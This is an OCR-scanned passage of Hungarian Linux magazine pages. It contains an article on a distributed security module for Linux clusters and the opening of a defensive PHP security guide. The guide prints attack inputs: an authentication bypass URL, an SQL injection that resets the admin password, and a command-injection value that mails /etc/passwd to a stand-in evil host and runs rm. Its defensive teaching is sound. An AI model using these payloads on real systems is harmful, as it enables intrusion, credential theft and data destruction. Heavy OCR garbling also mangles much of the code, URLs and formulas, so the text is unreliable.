nézve nélkülözhetetlen. Egyúttal az is kiderült, hogy egy ilyen 
jogosultság-ellenőrzési módszerrel a számítógépes környezet- 
ben pontosan szabályozhatók az egységek közötti bonyolult 
kapcsolatok. 

A DSI projekt részeként megvizsgáljuk a jogosultsági rendszer- 
hez létrehozott keretrendszer szerkezetét és felépítését. Létre- 
hozunk egy olyan Linux-rendszermagmodult, ami telepeken 
valósít meg jogosultság-ellenőrzést. Az ezen a területen végzett 
munkánkkal azt szeretnénk elérni, hogy Linux-telepek 
esetében is megbízható operációs rendszer legyen. 

Munkánk elsősorban a Flask-szerkezetre és a Linux biztonsági 
modul (LSM) keretrendszerre épül. Mi azonban nem a külön- 
álló rendszerekre összpontosítunk, hanem a telepekre épülő 
megoldásokra. Megvizsgáljuk a biztonsággal együtt járó 
teljesítménygondokat is, mivel egy-egy biztonsági megoldás 
olykor jelentős teljesítménybeli visszaeséssel járhat, ugyan- 


26 


Linuxvilág 





Felhasználómód 


3 Biztonsági Modul 
[A—f(SSec, TSec, Class] 


1. ábra Jogosultság-ellenőrzés az LSM-bővítménnyel 


akkor a felhasználó számára egyéb zavaró következményei 
is lehetnek. 

DSM-megvalósításunk egyik legfontosabb tulajdonsága, hogy 
osztott modellen alapul. Emiatt a biztonsággal kapcsolatos 
egységek elhelyezkedése a rendszerben a telep biztonságának 
szempontjából nézve nem lényeges. 


A Linux biztonsági modul (LSM) 

Az LSM-keretrendszer nem biztosít semmiféle kiegészítő 
védelmet a rendszermagban, ehelyett a biztonságos modulok 
fejlesztéséhez szükséges hátteret adja. Az LSM rendszermag- 
folt biztonsági területeket ad hozzá a rendszermag adatterü- 
leteihez és rendszerhívásaihoz (vagyis az úgynevezett kap- 
csokhoz), így biztosítva a modulszintű hozzáférés-védelmet. 
Az LSM tagfüggvényeket biztosít biztonsági modulok hozzá- 
adására és elvételére, valamint egy általános biztonsági rend- 
szerhívás is létezik, ami a felhasználói programok és az LSM-re 
épülő biztonsági bővítmények közti kapcsolattartásért felelős. 
Minden egyes LSM-kapocs (hook) egy függvénymutatóval 
rendelkezik egy teljes hatókörű, security ops nevű 
szerkezetben. Mivel ezek a függvények be vannak ágyazva a 
rendszermagba, és még egy biztonsági kiterjesztés beillesztése 
előtt is meghívódnak, kezdetben a függvények elérését tároló 
szerkezet az úgynevezett helyfoglaló függvényekre mutat. 
Ha betöltünk egy biztonsági bővítményt, az ezeket a helyfog- 
laló függvényeket a saját függvényeire cseréli le, amik már a 
tényleges biztonságot szolgálják. A helyfoglaló függvényeket 
a register security tagfüggvénnyel lehet lecserélni a 
modul saját függvényeire. 

Az unregister security tagfüggvény ennek az ellenke- 
zőjét teszi, vagyis a hivatkozásokat az egyszerű helyfoglaló 
függvényekre mutatókra cseréli le. 

Az LSM-tagfüggvények két csoportra oszthatók: 





1. a biztonsági területek kezeléséért felelős kapcsokra és 
2. a jogosultságok kezeléséért felelős kapcsokra. 


Minden egyes létrejövő Linux-erőforráshoz egy biztonsági 
címke kapcsolódik. Ezeknek a címkéknek a segítségével 
ellenőrizhetők a biztonsági kapcsokhoz fűződő jogosultságok. 
Ha az erőforrás megsemmisül, vele együtt semmisül meg a 
hozzátartozó címke is. A biztonsági területek kezeléséért felelős 
kapcsok felelősek a címkék létrehozásáért és eltávolításáért is. 
Erreatask security ops szerkezetben találhatunk példát, 
ilyenazalloc securityésa free security függvény. 
Az LSM-féle jogosultságkiosztás folyamata az 1. ábrán látható. 
legyük fel, hogy egy igénylő (jelen esetben egy folyamat) egy 
SSec biztonsági azonosítóval rendelkezik, és megpróbál 
hozzáférni (access (1) ) egy TSec biztonsági azonosítóval 
rendelkező erőforráshoz (esetünkben egy fájlhoz). A rendszer- 
hívást a Linux-rendszermag fogja kezelni (a rendszerhívási 
felület az 1. ábrán látható). Mielőtt a rendszermag döntene 

a művelet engedélyezéséről, kapcsolatba lép (a kapcsokon 
keresztül) az LSM-modullal (3.), ahol a felhasználóhoz kap- 
csolódó jogok kiosztása egy f függvényen keresztül valósul 
meg. Az LSM kiértékeli az f függvényt, az eredményt pedig 
visszaküldi a rendszermagnak. Ezután a rendszermag vagy 
engedélyezi a hozzáférést az erőforráshoz, vagy nem (4.). 


Az osztott biztonsági modul (DSM) 

A DSM a DSI részét képezi. A DSM megvalósításának célja 

a hozzáférés-szabályozás kikényszerítése, és a küldő gép és 
folyamat biztonsági azonosítóival a telep csomópontjai között 
az IP-üzenetek címkézése. A DSM fejlesztését a 2.4.17-es Linux- 
rendszermaggal és az ahhoz tartozó magfolttal (1sm-full- 
2002 01 15-2.4.17.patch) kezdtük. A DSM megvalósí- 
tása a CIPSO-n és a FIPS-188 szabványokon alapult, amely az 
IP fejlécének módosítását (vagyis az IP-fejléchez való kapcsolók 
hozzáadását), és a kapcsok hozzáadását szabályozza. 


Osztott biztonsági háttér (DSI) 

Mivel a DSM a DSI része, erről már az előző cikkünkben is 
olvashattak. Egy adatátvitelre kiélezett Linux-telep részeként 
a DSI-nek átvitelalapú követelményeknek kell megfelelnie: 
nevezetesen a megbízhatóságnak, a méretezhetőségnek és a 
magas rendelkezésreállásnak. Ezen túl a DSI a következőket 
támogatja: egységes keretrendszer, folyamatszintű megköze- 
lítés, többszálú biztonság, rugalmas biztonsági szabályzat, 
átlátszó kulcskezelési réteg — mindezek mellett a teljesítményt 
csak kis mértékben fogja vissza. 

A telep kezelése egyetlen gépről, a biztonságért felelős kiszol- 
gálóról végezhető el. Ez a kiszolgáló felel a rendszerben talál- 
ható összes biztonsági alkotórészért, és ez felelős az osztott 
biztonsági szabályzat betartásáért is. A biztonsági politikában 
történt változásokat a kiszolgáló szétküldi a biztonsági kezelők 
felé, és ezáltal rugalmas környezetet alakít ki. 

A biztonsági kezelők gondoskodnak helyileg a telep összes 
csomópontján a szabályok betartásáról és módosításáról. A biz- 
tonsági kezelők biztonsággal összefüggő adatokat csak a biz- 
tonsági kiszolgálóval cserélnek. 


Osztott jogosultsági szerkezet 

Egy telep hatékony jogosultsági rendszerének a megtervezése 
bonyolult feladat. Rengeteg tényezőtől függ a hozzáférési 
jogosultságok kiosztása, mivel az igénylők és az erőforrások 

a telepben bárhol elhelyezkedhetnek. Hogy leegyszerűsítsük 
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2. ábra Osztott jJogosultság-ellenőrző rendszer 


a kapcsolatokat, a hozzáférési jogosultságokat két szinten 
kezeljük. Helyi szinten az igénylő és az erőforrás egyetlen 
csomóponton található, míg távoli szinten az igénylő és az 
erőforrás különböző csomóponton helyezkedik el. Helyi szin- 
ten a jogosultságok az adott igénylői (SSID) és erőforrások 
erőforrási (TSID) biztonsági azonosítóihoz tartozó függvé- 
nynek megfelelően kerülnek elbírálásra (1. ábra). Ez a kiérté- 
kelés a Flask-szerkezet szerint történik: 

HozzgforOs - F ggvOny(SSID, TSID) 

A Flask-szerkezet megoldást jelent egy csomópontra épülő 
feldolgozás esetében. Ha a gépek egy telepbe vannak össze- 
fűzve, a biztonság megoldása még bonyolultabbá válik. Ebben 
az esetben a Flask-szerkezetet a telep távolihozzáférés-modellre 
bővítjük (2. ábra). 

Új kapcsolóinak egyike a biztonsági csomópontazonosító 
(SnID), vagyis egy olyan azonosító, ami a csomópontot hatá- 
rozza meg. Így a hozzáférési jogosultságok nemcsak az igény- 
lőtől és az erőforrástól függnek, hanem a kérdéses csomó- 
ponttól is. 

Az osztott jogosultsági rendszer szerkezete a 2. ábrán látható. 
A megfelelő szerkezet kiértékelése ennek megfelelően történik: 
Hozzgztorűs zs F gavüny(SniD2, SID2, SnIDI, SID1) 
Az osztott rendszer fontos része a hálózat, ami a csomóponto- 
kat köti össze. Ahhoz, hogy a hozzáférési jogosultságokhoz 
tartozó függvényeket a telepben alkalmazni tudjuk, a bizton- 
sági azonosítókat a csomópontban észrevétlenül kell továbbí- 
tani. Osztott jogosultsági rendszerünk mintapéldányát a Linux- 
rendszermagban próbáljuk ki, ami az átlátszóságot és a jobb 
teljesítményt biztosítja nekünk. 

A harmadik ábrán láthatjuk, hogyan működik az osztott biz- 
tonsági rendszer. A biztonsági kiszolgáló felelős a biztonsági 
szabályzatnak a bővítményhez történő továbbításáért. A ki- 
szolgáló feladata az is, hogy minden egyes csomóponthoz 
egyedi biztonsági azonosítót rendeljen (1.). Tételezzük fel, 
hogy igénylő2 Sn1D2 csomópontban megpróbál elérni egy 
erőforrást (egy fájlt) az SnID1 csomóponton (2.). Ebben az 
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3. ábra Jogosultság-ellenőrzés egy csomóponton 


esetben igénylő2-nek először jogosultságokat kell szereznie 

a helyi kapcsolattartási erőforrásokhoz, és hozzá kell jutnia két 
azonosítóhoz (Sn1D2 , SID2), amiket azután továbbít a másik 
csomópontnak (4.). Ezeknek az azonosítóknak az érvényes- 
ségét SnID1-es csomópont is ellenőrzi. Amennyiben a hozzá- 
férés megadható, az üzenet továbbítható az 1-es folyamatnak 
(5.). Ekkor az 1-es folyamat fog hozzáférésért folyamodni a 2-es 
folyamat nevében (6.). 


Hozzáférési jogosultságok a csomóponton 

Ez a rész egy kicsit nagyobb részletességgel magyarázza el, mi 
történik a telep egyetlen csomópontján. A hozzáférési jogosult- 
ságok ellenőrzése a telep minden csomópontján két lépésben 
történik (3. ábra). 


1. Rendszermagszinten: ez a szint felelős az elbírálásért és a 
döntések betarttatásáért, amiket külön felelősségként kezel. 
A rendszermag karbantartja a biztonsági politikát, és ennek 
alapján hozza meg döntéseit. A biztonsági politikát a bizton- 
sági kiszolgáló szolgáltatja, és a gyors elérhetőség érdekében 
a helyi memóriában tárolódik. 

2. Felhasználói szint: megannyi feladata közül (3. ábra) az egyik 
az osztott biztonsági politikának (1.) a biztonsági szerep- 
körök tárolóhelyéről a rendszermaghoz történő eljuttatása. 
Miután a szerepköröket összeállította, olyan formában 
továbbítja őket a rendszermaghoz, hogy az már könnyedén 
feldolgozhatja (2., 3., 4.). A rendszermagban keletkező riasz- 
tások is erről a szintről jutnak vissza a biztonsági kezelőhöz, 
ami a naplózó és elemző szolgáltatásokhoz továbbítja, illetve 
szükség esetén egy biztonságos közvetítő csatornán keresztül 
a biztonsági kiszolgálóhoz is továbbítja őket. 


Mindkét szintet a helyi biztonsági kezelő (SM) indítja el és 
figyeli minden egyes csomóponton. Az SM hangolja össze a 
DSI alatt futó egyéb olyan szolgáltatásokkal is, amelyekkel 
kapcsolatba kell lépniük. Ha egy felhasználói folyamat a rend- 
szer-erőforráshoz szeretne hozzáférni (5.), a rendszerhívás 
továbbítódik a DSM felé (6.), ahol végül megszületik a döntés 


stk 


a DSP belső ábrázolásának megfelelően (7.). 


Címkék 
Minden igénylőnek és erőforrásnak rendelkeznie kell azono- 


sítóval. Mivel a biztonsági bővítmény már futási időben betöl- 
tődik, kétfajta igénylőcímzés között teszünk különbséget: 
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1. A bővítmény betöltődése előtt az igénylők és erőforrások 
nem kapnak címkét a rendszerben. A bővítmény betöltődése 
során minden futó folyamatot megvizsgál és címkével lát el. 


2. Ha egy folyamat a bővítmény betöltődése után jön létre, 
a biztonsági kapcsok végzik el a címkézést. 


Mivel a Linux a folyamatleírókat és a rendszermag-üzemmódú 
folyamatvermet egyetlen 8 KB-s memóriaterületen tárolja, az 
igénylők címkéinek szükségtelen külön további memóriaterü- 
leteket lefoglalnunk. 

A többi címke futásidőben rendelődik hozzá az erőforrásokhoz, 


ennek következtében a bővítmény ellenőrzi a címke meglétét. 
Ha hiányzik a címke, újat hoz létre. 


Hálózati címkék 

Mivel a telepben egy igénylő a más csomópontokon lévő erő- 
forrásokhoz is hozzáférhet (2. ábra), az ilyenfajta hozzáféréseket 
is ellenőrizni kell. Ha egy folyamat az egyik csomóponton egy 
másik csomóponton lévő erőforrást akar elérni, először a helyi 
kapcsolattartó eszközök (foglalat, hálózati eszköz) eléréséhez 
való jogosultságokat kell ellenőrizni. Ha a helyi hozzáférés ren- 
delkezésre áll, az üzenet továbbítható a másik csomóponttra. 
Ahhoz, hogy a küldő igénylőt azonosítani lehessen, az IP- 
csomaghoz mellékelni kell a küldő csomópont és az igénylő 
biztonsági azonosítóját. Ennek a megvalósítására az adatcse- 
réhez az IP-t használjuk fel. Az IP-protokollveremben a kapcso- 
kon keresztül új értékek adódnak az IP-fejléchez. A fogadóol- 
dalon ezeket az adatokat (a csomópont biztonsági azonosítóját 
és az igénylő biztonsági azonosítóját) az ottani IP-protokollve- 
remben található kapcsok hálózati biztonsági azonosítóvá 
alakítják (NSID). A kiértékelés az alábbi módon történik: 

NSID z F ggvőny (SniD, SID). 

Ezt a függvényt a biztonsági kiszolgáló egy átalakítótábla 
formájában is szolgáltathatja (jelenleg egy egyszerű matema- 
tikai függvény használatos erre a célra). A fogadóoldal tehát 
úgy állítja elő a hálózati biztonsági azonosítót, hogy az átala- 
kítótáblában megkeresi az SnID-hez és SID-hez tartozó bejegy- 
zést. Ezután az NSID már helyi azonosítóként használható az 
erőforrások elérésekor. 


Kísérletezés a DSM-mel 

Több lépést is végre kell hajtanod, hogy le tudd fordítani és 
futtatni tudd a DSM-et. A példában feltételezzük, hogy a te 
rendszereden is Red Hat 7.2 fut 2.4.17-es Linux-rendszermag- 
gal (a 5 http:/kernel.org-ról). 

Az elvégzendő lépések a következők (a későbbiekben 
részletesebben tárgyaljuk őket): 


e —  Alkalmazd rá az LSM-foltot a 2.4.17-es rendszermagra. 

e . Módosítsd a rendszermag beállításait, és fordítsd újra 
ezekkel az új beállításokkal. 

e  Frissítsd a rendszerindítási beállításokat a /etc/lilo.conf 
fájlban. 

e Indítsd újra a számítógépet az új rendszermaggal. 

e — Fordítsd le és futtasd a biztonsági bővítményt. 

e — Végezz el néhány kísérletet, hogy lásd, a bővítmény 
megfelelően működik-e. 


A rendszermag újrafordítása az LSM heállításaival 


Az osztott biztonsági bővítmény az LSM hátterére épül (ami 
a rendszermaghoz kötődő kapcsokból tevődik össze), és a biz- 





tonsági folt az LSM weboldaláról tölthető le. Az oldal több 
különböző foltot is tartalmaz; neked a rendszermagodhoz illő 
változatot kell letöltened, ami ebben az esetben a 2.4.17-es. 

A következő lépéseket hajtsd végre a folt telepítéséhez. Először 
töltsd le az Ism-full-2002 01 15-2.4.17.patch.gz fájlt a /usr/src 
könyvtárba, és csomagold ki a foltot: 


7 gunzip lsm-fuli-2002 01 15-2.4.17.patch.gz 


Ezt követően lépj be a rendszermag forrásához, és alkalmazd 
a foltot: 


ao 


cd /úsr/jsre/jliíinüx 
s patch -pi c 
/usr/src/1lsm-full-2002 01 15-2.4.17.patch 


Miután ez megvan, állítsd be a rendszermagot, hogy támogas- 

sa az új bővítményt. A következő beállításokon kell változtatni: 

e CODE MATURITY LEVEL: fejlesztés alatt álló és befejezetlen 
kódok, eszközmeghajtók mutatása. Ez elengedhetetlen. 

e . LOADABLE MODULE SUPPORT: ezt a legjobb kikapcsolni, 
hogy az eltérő változatszámokkal ne legyenek gondjaink. 

e . NETWORKING OPTIONS: a hálózati csomagszűrést 
feltétlenül engedélyezzük, mivel az IP-veremben található 
kapcsok csak így működnek. A rendszermagszintű HTIP- 
gyorsítást állítsuk m-re, így a rendszermagban a 


tep sync mss beállítás elérhető lesz. 





e . SECURITY OPTIONS: a capabilities support-ot állítsuk m-re, 
az IP networking support-ot n-re, az NSA SELinux Support-ot 
m-re, az NSA SELinux Development Module-t y-ra, az NSA 
SELinux MLS policy (EXPERIMENTAL)-t n-re, az LSM port 
of Openwall (EXPERIMENTAL)-t n-re, és a Domain and 
Type Enforcement (EXPERIMENTAL)-t n-re. 


Ha ezzel megvagy, egyszerűen fordítsd újra a rendszermagot 
és az új bővítményeket, majd futtasd a 1lilo parancsot, 
ahogy szoktad. 


A DSM telepítése és használata 

Mivel jelenleg az összes DSI-bővítmény még nincs működő- 
képes állapotban, létrehoztunk néhány olyan próbaprogramot, 
amik utánozzák a hiányzó részeket, például a biztonsági sza- 
bályzat betöltését vagy a riasztások fogadását. 
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4 a 


A bővítményt használat előtt először is be kell töltenünk 
a rendszermagba: 


2: /ebin/irismod lem. o 


Ezután a szabályzatot biztosítani kell a biztonsági bővítmény- 
nek. Erre a feladatra a biztonsági fájl egy egyszerű szöveges fájl 
lesz négy mezővel: forrás biztonsági azonosító; cél biztonsági 
azonosító; osztály (jelenleg csak háromféle osztály van elké- 
szítve: a folyamatok sokszorosításáért, a foglalatokért és a 
hálózatokért felelős); végül pedig az engedély. 


1 1 1 0x01 

1 1 2 0Xx07 

1 1 3 0x01 

A szabályzatot a próbaprogramunkkal tölthetjük be, amit 
UpdatePolicy-nak hívunk: 


$ UpdatePolicy szabElyzat fEjl 


A riasztásokat egy másik próbaprogrammal foghatjuk el, 
a CheckAlarm-mal. A programot így indíthatjuk el: 


3 CheckAlarm 


Egy folyamat alapértelmezett azonosítóján úgy változtatha- 
tunk, ha az ELF formájú fájl kitöltő 
részében a legelső bájtot megvál- 
toztatjuk (ez a fájl 8. bájtja). 


A kísérleti rendszer 

Háromfajta kipróbálási típust hajtot- 

tunk végre, hogy előzetesen meg 

tudjuk állapítani a biztonsági bővít- 
mény teljesítményét. A legelső próba 

a folyamatok szétágaztatásán és létre- 

hozásán alapul (fork), a második az 

UDP helyi, a harmadik az UDP távoli 

elérésén. Az UDP-próbát IP-fejlécmó- 

dosítással és anélkül is elvégeztük, 
hogy lássuk, mennyire erőforrás-igé- 
nyes ez a módosítás. 

A kipróbálást egy Pentium II[-as 

650 MHz-es gépen végeztük el, ami- 

ben 256 MB RAM volt. Az alábbi 

próbamódszerekkel dolgoztunk: 

1. Folyamatok létrehozása: megmérjük, mennyi idő szükséges 
egy új folyamat létrehozásához, ami nem tesz mást, csak 
azonnal befejezi a futását. A szülőfolyamat százezerszer 
futtatja le a fork és wait hívásokat. 

2. UDP helyi elérés: megmérjük, mennyi időbe telik egy UDP- 
üzenet küldése. A folyamat egy ciklusból ötszázezer UDP- 
üzenetet küld el. A küldő folyamat nem ellenőrzi, hogy a 
csomag valóban el lett-e küldve, visszajelzésre sem vár, hogy 
a címzett megkapta-e. Ebben az esetben nem lényeges, hogy 
a kiszolgálón telepítve van-e a DSM vagy sem. 

3. UDP távoli hozzáférési próba: leméri, hogy egy folyamatnak 
mennyi idejébe kerül egy UDP-üzenet elküldése és a kiszol- 
gálótól egy UDP-üzenet fogadása. Ez a próba százezer UDP- 
üzenetet fogad és küld egy ciklusból. Az ügyfélprogram 
-— amint visszaigazolást kapott az előző csomagról — újabb 
csomagot küld. Ebben az esetben lényeges, hogy a kiszol- 
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gálón fusson a DSM-szolgáltatás, hogy a fogadóoldalon a 
jogosultságokat megfelelően ellenőrizze. Próbánkban a má- 
sodik kiszolgáló egy Pentium I[-es 300 MHz-es asztali gép 
128 MB RAM-mal. 


A teljesítnénypróba eredménye 
A próbák eredményei az 1. és a 2. táblázatban láthatók. A szá- 
mok mikroszekundumban vannak megadva. 


1. Folyamatok létrehozása: 1,2 százalékos teljesítménycsökke- 
néssel kell számolnunk, mivel a rendszernek a fork művelet 
elvégzésekor ellenőriznie kell a hozzáférési jogosultságokat, 
és a keletkezett gyermekfolyamatokat megfelelően fel kell 
címkéznie. 

2. UDP helyi elérés: a DSM-bővítménnyel és az anélkül végzett 
próba során a teljesítménykülönbség húsz százalékos. Ebben 
az esetben a rendszernek el kell végeznie a jogosultságellen- 
őrzést a foglalatokon, el kell küldenie az üzenetet és minden 
üzenethez az sk buff címkemellékletet, valamint meg kell 
címkéznie az IP-csomagokat. Ha az IP-csomagokat nem 
módosítjuk (2. táblázat), a teljesítménykülönbség 4,2 száza- 
lékra csökken. 

3. UDP távoli hozzáférési próba: az átlagos teljesítménykülönb- 
ség a DSM-bővítménnyel és anélkül harminc százalék. Ebben 
az esetben a túlterhelést a következők jelentik: a foglalatokon 
el kell végezni a jogosultságok ellenőrzését, az sk buff-hoz 
hozzá kell rendelni egy címkét, a biztonsági adatokat kap- 
csolni kell az IP-csomaghoz, a biztonsági adatokat le kell 
kérdezni a fogadóoldalon, a hálózati biztonsági azonosítót 
hozzá kell adni az sk buf£f-hoz, el kell végezni az 
sk buff-hoz tartozó jogosultságok ellenőrzését, és a fogla- 
laton újra el kell végezni a biztonsági ellenőrzést, majd 
ugyanezt meg kell ismételni a másik oldalon is. Ha az IP-cso- 
magot nem módosítjuk (2. táblázat), a teljesítménykülönbség 
54 százalékra mérséklődik. 


Mindkét UDP-próbában a legnagyobb plusz terhelést az IP-cso- 
magok módosítása jelentette. A biztonsági bővítmény csak 
viszonylag kevés plusz terhelést okozott. 


Folyamatban lévő munkák 

A DSM-mel kapcsolatos terveink és folyamatban lévő munkáink: 

e A jogosultságokat ellenőrző szétosztott keretrendszer teljes 
megvalósítása. 

e A kód gyorsabbá tétele. 

e — Biztosítani a kiszolgáló erőforrásainak, hogy egy ügyfél 
nevében tevékenykedhessen. 

e A biztonsági adatok védelme. 

e  Áthelyezni a biztonsági adatok szállítását egy alacsonyabb 
hálózati rétegbe. 

e A telep biztonságának ellenőrzése különféle támadási 
módszerek esetében. 


Összegzés 

Mint korábban részleteztem, a DSM a DSI-szerkezet része. 
Eddig csak alapvető DSM-megvalósítással rendelkeztünk. 

A teljesítménypróbákat úgy kell tekinteni, hogy egyetlen 
biztonsági eljárást sem tettünk hatékonyabbá. 

Az IP-csomagok feldolgozását kissé felgyorsítottuk. Az elsőd- 
leges eredmények jelentős teljesítménynövekedést mutattak. 
A helyi UDP-kezelés IP-csomagmódosítással húszról nyolc szá- 
zalékra csökkent (1. tábla), és ehhez hasonlóan a távoli UDP- 
hozzáférés is harminc százalékos különbségről 14 százalékosra 
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gyorsult. Ezek az eredmények ígéretesek, és vannak további 
ötleteink arra nézvést, hogyan gyorsíthatnánk fel egyes folya- 
matokat még jobban. Mindazonáltal az eredmények jól mutat- 
ják, hogy milyen kihívásokkal kell szembenéznie egy osztott 
rendszerek biztonságával foglalkozó fejlesztőnek. A rendszert 
valódi környezetben is kipróbáltuk, kísérletet tettünk néhány 
tártúlcsordulásos támadással, és ez megmutatta, hogy a jelen- 
legi rendszer ellenáll az ilyen támadási próbálkozásoknak. 
Végül megjegyeznénk, hogy minden tőlünk telhetőt megtet- 
tünk, hogy a lehető legjobban leírjuk a DSM működését a 
rendelkezésünkre álló elég szűkre szabott hely keretein belül. 
Amennyiben további részletekre vagy kíváncsi, nyugodtan 
keress meg minket. Reméljük, ki fogod próbálni a DSM forrás- 
kódját és a hozzátartozó próbaprogramokat, és a tapasztala- 
taidat megírod nekünk. A teljes forráskód a CD-melléklet 
Magazir/DSM könyvtárában megtalálható. 
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3A PHP-programozás és a biztonság 


Meglehetősen könnyű olyan kódot Írni, ami ellenáll az általános támadásoknak. 


Ismerkedjünk meg az alapelvekkel! 


bben a cikkben a PHP programozási nyelvvel kapcso- 
latos biztonsági fenyegetésekkel és a támadások kikü- 
szöbölésének módozataival ismerkedünk meg. Iudnod 
kell, hogy most csak néhány lehetséges hibát és elkerülési 
módozatot tárgyaluk, ezzel is csökkenteni szeretnénk a lehet- 
séges támadások kockázatát, egyben növelni az okos véde- 
kezés esélyeit. 

Biztonságos alkalmazás írásakor a legalapvetőbb szabály, hogy 
a felhasználó által megadott bemenetben sosem szabad meg- 
bízni! A nem megfelelően ellenőrzött beolvasott értékek jelen- 
tik a legnagyobb veszélyt a webes alkalmazások esetében. Más 
szavakkal, a felhasználói bevitelt mindaddig bűnösnek tekint- 
jük, amíg ártatlansága nem bizonyított. 





Teljes változói hatókör 

A 4.2.0 előtti PHP-változatok a bejegyzett változókat az egész 
program területén érvényessé tették, így egyetlen változó tartal- 
mában sem lehetett bízni, lehetett az külső vagy belső változó. 
Nézzük meg ezt a példát: 


c?php 
if (felhasznalo azonositasa()) ( 


Sazonositva - true; 


if (!Sazonositva) í( 


die("HozzgzfOorOs megtagadva!" ) ; 
95 


Ha a GEI-módszerrel az Sazonositva változót 1-re állítod, 
mint ebben a példában: 


http: //example . com/admin.php?azonositva-1 


akkor a második azonosítási kapun sikerrel átjuthatnál. 
Szerencsére a 4.1.0-s változat óta a PHP nem támogatja a 
register globals-t. Ez annyit tesz, hogy a GET-en, POST- 
on a sütikkel, kiszolgálótól, munkakörnyezetből kapott válto- 
zók, illetve az adott munkafolyamat változói már nem lesznek 
önműködően a teljes programból elérhetők, vagyis nem kap- 
nak teljes hatókört. Az így létrejövő változók ezentúl a PHP kü- 
lönleges tömbjein keresztül lesznek elérhetők. Az így létrejövő 
egyes tömbök nevei: $ GET, $ POST, $ COOKIE, $ SERVER, 
$ ENV, $ REGUEST, és $ SESSION. 

Ha a register globals változó nálad be lenne kapcsolva, 
légy kegyes önmagadhoz, és kapcsold ki! Ha kikapcsolod, és 
megfelelően ellenőrzöd a felhasználói adatbevitelt, máris nagy 
lépést tettél a biztonság eléréséhez vezető rögös úton. Sok 
esetben a típuskényszerítés elégséges ellenőrzésnek minősül. 
A felhasználó böngészőjében futó JavaScriptre épülő űrlapel- 
lenőrzők teljesen hatástalanok, mivel a felhasználó még bár- 
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milyen adatot el tud küldeni tőlük a programnak — nem csak 
azokat, amelyeket az űrlap egyébként engedélyezne. Lássunk 
egy példát, hogyan is fest mindez: 


2z?php 
9. anaaLONI azonosítva] zs falsó; 
if (felhasznalo azonositasa()) 1 


5. RSS LON[/ázonósítva"] S tCtúészs 


if (!$ SESSION["azonositva"]) ( 


die (( "HozzgforOs megtagadva!" ) ; 
.. 


Adatbázis-műveletek 

A legtöbb PHP-program valamilyen adatbázisra épül, így a 
felhasználótól bekért adatokból hoz létre SOL-lekérdezéseket. 
Az ilyenfajta kapcsolatok veszélyforrássá válhatnak. 
Képzeljünk el egy PHP-programot, ami egy táblából származó 
adatokkal dolgozik. Majd ugyanez a program egy webes 
űrlapon keresztül visszaküldeti magának az adatokat a POST 
eljárás segítségével, és a felhasználó kérésének megfelelően 
frissíti a táblát: 


2?php 
if ($lekerdezes az urlapbol) ( 
S$db-sguery ("update Stabla set 


snev-Snev!") ; 
95 


Ha nem ellenőrzöd le az űrlaptól kapott Stabla változót, és 
azt, hogy a S$lekerdezes az urlapbol változó tényleg az 
űrlaptól jött-e (a $ POST[/" lekerdezes az urlapbol"] 
segítségével), akkor a változót akár egy GET-en keresztül is 
visszaküldhették. Például ilyen módon: 


http: //example . com/edit .php? 
5 lekerdezes az urlapbol-16tabla-usersiset- 
5password$s3Daaarwheretusers3D$27admins$271 523 


Ez a következő SOL-lekérdezést eredményezi: 


update users set password-aaa 
where user-"admin" H set name-Sname 


Egyszerűen leellenőrizhetjük a $tabla változó értékét, ha 
megnézzük, hogy mondjuk csak betűket tartalmaz-e vagy 


egyetlen szóból áll-e: 


if (count (explode("", tabla) ) ( ... b 
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Külső programok hívása 

Néha szükség lehet rá, hogy PHP-programunkból külső prog- 
ramot hívjunk meg - a system ( ) , exec () , popen() vagy 
passthru() függvényeket, vagy az egyszeres fordított idéző- 
jel műveleti jelet felhasználva. Az egyik legveszélyesebb dolog, 
amikor valamilyen felhasználótól bekért adattal — akár prog- 
ramnévként, akár kapcsolóként -— szeretnénk meghívni egy 
programot. Az ezzel járó veszélyekre a PHP-kézikönyv is külön 
figyelmeztet; megjegyzi, hogy amennyiben egy programot a 
felhasználótól származó adattal hívunk meg, szükség lehet az 
escapeshellarg() vagy escapeshellcmad ( ) függvények 
használatára, így elkerülhetjük, hogy a felhasználó a rendszert 
kijátszva bármilyen program végrehajtására képes legyen. 
Nézzük a következő példát: 


c ?php 
SÍp - popen(" /usr/sbin/sendmail -i ". 
Scimzett, "w") ; 


95 


A felhasználó ebben az esetben a S$cimzett változót egysze- 
rűen módosíthatja, méghozzá így: 


http: //example . com/ send.php?Scimzett-gonoszs$§ 
s 4Ogonosz .o0rg153C3r52Fetcs2Fpasswd$3B-irm-t52A 


A kérés következtében a következő utasítások futnának le: 


/usr/sbin/sendmail -i 
5 gonoszagonosz . org/etc/passwd; rm 


A biztonsági hiba egyszerűen orvosolható: 


c ?php 
SÍp - popen(" /usr/sbin/sendmail -i ". 
ssescapeshellarg(Scimzett) , "w"!") ; 
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Még ennél is jobb, ha a Scimzett változóban található értéket 
ellenőrzöd egy szabályos kifejezéssel (regexp, vagyis regular 


expression), hogy valóban szabályos levélcím található-e benne. 


Fájlok feltöltése 

Fájlfeltöltésnél úgyszintén számítanunk kell hibákra a PHP 
által alkalmazott módszer miatt. A PHP létrehoz egy teljes 
hatókörű változót a fájl űrlapban lévő bemeneti tagjának 
megfelelően, majd ezt követően létrehoz egy állományt 

a feltöltött fájl tartalmának megfelelően, azt azonban nem 
ellenőrzi, hogy a fájlnév elfogadható-e, és hogy valóban 

a feltöltött fájlt takarja-e. 


c ?php 
1E 


(stáaji feltöoltes €4 BÉn typé 
—m"image/gif" §66 
Sfn size c 100000) ( 
copy (SÍfn, "kgpek/") ; 


unlink (Sfn) ; 


] 
?5 
zet örm methodc"post" names "fajl feltöltése" 
s action-"fupload.php" enctype-"multipart/ 
—form-data"s 
File: cinput type-"file" name-"fn": 
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z1npüt. types"süomit" námes"fajl feltöltes" 
—svalue-"Felt It$s"-: 


Egy rossz szándékú felhasználó létrehozhatja a saját űrlapját, 
ami mondjuk valamilyen kényes dolgokat tartalmazó fájlra 
hivatkozik, és ilyen módon rávehetné a programunkat, hogy 
a kívánt fájlt jelenítse meg: 


zftorm methods"post" name-vfajt feltöltese" 
ss az ötion-"fupload: php" s 

cinput type-"hidden" name-"fn" 
5value-"/var/www/html/index.php": 

sinpüt types"hidden" . names"fn type" 
—value-"text!": 

ziíinpüt typesz"hidden" námes"fn size" 
—value—-"22": 

zíinpuüt type-"suomit" names"fajl feltöltes" 
—svalue-"Felt ItXgs": 


Ilyen módon a program a /var/wwwy/html/index.php fájlt 
másolná a képek/ könyvtárba. A megoldást a 

move uploaded file() ésis uploaded file() 
függvények használata jelenti. A felhasználó által feltöltött 
